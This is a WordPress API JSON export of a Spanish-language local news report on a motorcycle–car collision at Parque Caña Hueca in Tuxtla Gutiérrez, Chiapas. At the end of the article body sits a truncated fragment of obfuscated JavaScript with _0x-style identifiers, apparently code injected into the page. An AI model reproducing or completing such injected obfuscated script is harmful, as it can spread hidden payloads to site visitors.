{"id":15369,"date":"2024-05-01T01:26:53","date_gmt":"2024-05-01T01:26:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15369"},"modified":"2024-05-01T01:26:54","modified_gmt":"2024-05-01T01:26:54","slug":"motociclista-y-particular-colisionan-frente-a-cana-hueca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15369","title":{"rendered":"Motociclista y particular, colisionan frente a Ca\u00f1a Hueca"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15371\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526639965-1024x576.jpg\" alt=\"\" class=\"wp-image-15371\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526639965-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526639965-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526639965-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526639965.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"439\" data-id=\"15370\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526642741-1024x439.jpg\" alt=\"\" class=\"wp-image-15370\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526642741-1024x439.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526642741-300x129.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526642741-768x329.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526642741.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15372\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526636994-1024x576.jpg\" alt=\"\" class=\"wp-image-15372\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526636994-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526636994-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526636994-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1714526636994.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un herido y da\u00f1os materiales fue el saldo de un accidente de tr\u00e1nsito ocurrido este martes por la tarde, frente al Parque Ca\u00f1a Hueca, entre un motociclista y un automovil particular.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3, cuando el joven motociclista circulaba de Sur a Norte, sobre la prolongaci\u00f3n de la 5a Norte Poniente y justo en la entrada del Parque, un autom\u00f3vil Sed\u00e1n le hizo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Testigos relataron que, la conductora del veh\u00edculo, atraves\u00f3 la v\u00eda sin precauci\u00f3n sin observar al conductor de la moto.<\/p>\n\n\n\n<p>Por el golpe el joven present\u00f3 diferentes golpes y raspones, en el brazo izquierdo a la altura de la mu\u00f1eca, pero no fue trasladado.<\/p>\n\n\n\n<p>En el lugar la conductora se hizo responsable de los gastos generados por la colisi\u00f3n y as\u00ed evitaron la intervenci\u00f3n de las autoridades competentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un herido y da\u00f1os materiales fue el saldo de un accidente de tr\u00e1nsito ocurrido este martes por la tarde, frente al Parque Ca\u00f1a Hueca, entre un motociclista y un automovil particular. Los reportes oficiales informaron que, este hecho ocurri\u00f3, cuando el joven motociclista &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15369","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15369"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15369\/revisions"}],"predecessor-version":[{"id":15373,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15369\/revisions\/15373"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15370"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}